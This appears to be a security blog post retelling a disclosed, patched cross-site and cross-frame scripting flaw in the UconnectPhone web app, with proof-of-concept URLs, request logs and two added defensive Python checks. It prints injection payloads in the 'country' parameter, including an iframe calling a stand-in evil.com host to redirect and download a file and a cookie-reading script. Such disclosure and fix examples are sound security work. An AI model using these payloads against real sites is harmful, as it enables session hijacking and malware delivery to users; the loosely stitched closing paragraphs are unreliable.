Bugs in the UconnectPhone Web App That Allow an Attacker to Own a Car's Remote System

This year we heard about a BMW hack found by Benjamin Kunz Mejri of Vulnerability Lab. Last week another Vulnerability Lab team member, SaifAllah benMassaoud, disclosed two bugs in the UconnectPhone web application: Cross Frame Scripting (XFS) and Cross Site Scripting (XSS). XFS is a type of attack that combines malicious JavaScript with an iframe.

Let's take a look at a simple scenario of how this attack works.

A user uses the touch screen to select their country, but an attacker can load a malicious script that then sends those details to the attacker.

Proof of Concept and How to Reproduce for Penetration Testers

The X-Frame-Options header is missing on the uconnect-phone web application, so there is no protection against the page being framed by externally requested sources.

— PoC Session Logs —
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
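The response in the PoC log above carries no anti-framing header at all. The following check is an added example, not part of the advisory: it parses a raw HTTP response and decides whether other origins can frame the page, treating a CSP frame-ancestors directive as authoritative and otherwise falling back to X-Frame-Options. The two sample responses are constructed; the first mirrors the vulnerable response above, the second shows the same response with the fix applied.

```python
from typing import Dict, Tuple

def parse_response_headers(raw: str) -> Dict[str, str]:
    """Parse a raw HTTP response's header block into a lowercase-keyed dict."""
    headers: Dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def framing_policy(headers: Dict[str, str]) -> Tuple[bool, str]:
    """Return (frameable_by_other_origins, reason)."""
    csp = headers.get("content-security-policy", "")
    # frame-ancestors takes precedence over X-Frame-Options where CSP is supported.
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if "*" in sources:
                return True, "frame-ancestors * allows any origin"
            return False, "frame-ancestors limits framing to " + " ".join(sources)
    xfo = headers.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False, "X-Frame-Options " + xfo
    if xfo.startswith("ALLOW-FROM"):
        return True, "ALLOW-FROM is obsolete; browsers that drop it leave the page frameable"
    return True, "no X-Frame-Options and no CSP frame-ancestors"

# Constructed sample mirroring the vulnerable response in the PoC log above.
VULNERABLE_RESPONSE = """HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
"""

# The same response with the fix: both headers, to cover old and new browsers.
FIXED_RESPONSE = """HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Transfer-Encoding: chunked
Connection: keep-alive
"""

if __name__ == "__main__":
    for label, raw in (("vulnerable", VULNERABLE_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(label, framing_policy(parse_response_headers(raw)))
```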

PoC: Attack Scheme

[Malicious Site + IP Adress/Redirection + File]:=[download]

PoC: Exploitation

http://www.uconnectphone.com/?region=NAFTA&country="><iframe src="http://evil.com/ & IP address/[Redirect & Download File"></iframe>&request_locale=en&brand=none&selection=2

PoC: Payload

"><iframe src="http://evil.com/ & IP address/[redirect & Download File"></iframe>

— PoC Session Logs [GET] —

/?region=NAFTA&country="><iframe src="http://evil.com/ & IP address/[redirect & Download File"></iframe>&request_locale=en&brand=none&selection=2 HTTP/1.1
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Via the Browser

http://www.uconnectphone.com/?region=NAFTA&country="><iframe src="javascript:alert(document.cookie)"></iframe>&request_locale=en&brand=none&selection=2

— PoC Session Logs [GET] —
/?region=NAFTA&country="><iframe src="javascript:alert(document.cookie)"></iframe>&request_locale=en&brand=none&selection=2 HTTP/1.1
Host: www.uconnectphone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Once the victim enters credentials into the legitimate site within the iframe context, the malicious JavaScript steals the keystrokes. The vulnerability is located in the `country` parameter of the GET request. An attacker might also redirect the victim to a web page that automatically downloads a malicious file.
The more dangerous variant of this attack is that an attacker could also exploit the vulnerability of the software like this:

The attacker can send the victim a malicious link that downloads a malicious PDF file, which can be used to exploit an outdated version of Adobe Reader, or a malicious APK file that can be used to exploit the victim's Android operating system.

This scenario would allow an offensive attacker to own the remote computer system of connected cars such as `Chrysler, Dodge, FIAT, Jeep & Ram`, which use `Uconnect Access` for the vehicle connectivity system and run the integrated Android Auto v8.4 Uconnect system. The vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.
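The root cause described above is the `country` value being reflected into the page without output encoding. The snippet below is an added example and not the UconnectPhone application's code (which is not public): it shows a reflection into an HTML attribute the way the PoC implies, beside a hardened version that encodes for the attribute context, plus an allowlist check as a first layer. The template, the hidden-input markup and the two-letter country shape are assumptions; the payload is the one from the PoC above with its quotes straightened.

```python
import html
import re

# Assumed template: the selected country is reflected into an attribute value.
TEMPLATE = '<input type="hidden" name="country" value="{country}">'

# Constructed payload mirroring the PoC on this page (quotes straightened).
PAYLOAD = '"><iframe src="javascript:alert(document.cookie)"></iframe>'

def render_country_vulnerable(country: str) -> str:
    """Reflects the raw query value: a leading "> closes the attribute and the tag."""
    return TEMPLATE.format(country=country)

def render_country_fixed(country: str) -> str:
    """Encode for the attribute context: quote=True also turns " and ' into entities."""
    return TEMPLATE.format(country=html.escape(country, quote=True))

def is_allowed_country(country: str) -> bool:
    """First layer, applied before rendering: accept only the expected input shape
    (assumed here to be a two-letter country code)."""
    return re.fullmatch(r"[A-Za-z]{2}", country) is not None

def contains_injected_element(markup: str) -> bool:
    """True when the rendered fragment carries any element beyond the single <input>."""
    return len(re.findall(r"<[a-zA-Z]", markup)) > 1

if __name__ == "__main__":
    print(render_country_vulnerable(PAYLOAD))  # attribute closed early, <iframe> injected
    print(render_country_fixed(PAYLOAD))       # attribute stays closed, no new element
    print(is_allowed_country("US"), is_allowed_country(PAYLOAD))
```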

UconnectPhone WebApp API
FCA US LLC
Product : UconnectPhone – Web App ( API )
[+] Advisory : https://www.vulnerability-lab.com/get_content.php?id=2020
[+] Fix & Patch : The vulnerability has been patched by the FCA team

Hackers are always finding some new way to trick cars, and this attack is usually only successful when combined with social engineering. As more cars become mobile, internet-connected appliances, they become more likely targets for phishing attacks and remote hacking. Hopefully Chrysler, Dodge, FIAT, Jeep & Ram … The hack uses the Uconnect system as a gateway into the car and then gains access to the Jeep's infotainment head unit. Once there, the attacker reaches the head unit's firmware, which allows access to the whole CAN bus of the car, essentially the car's nervous system, and that access is what allows for the really scary stuff, like control of the wipers, brakes, throttle and even some limited control (in reverse only, for now) of the steering.
Uplink, an Internet-connected computer feature in hundreds of thousands of Fiat Chrysler cars, SUVs, and trucks, controls the vehicle's entertainment and navigation, enables phone calls, and even offers a Wi-Fi hot spot …
For example: if you allow Uconnect to access your contacts and call history, the system tells you to visit Uconnectphone, the vulnerable web app. If you navigate there, you are hacked. As I said, "hackers are always finding some new way to trick cars". Sure, it is a nice demonstration of the attack using these two vulnerabilities, but it's not exactly an easy one to just find. As many researchers say, "Super nice one".
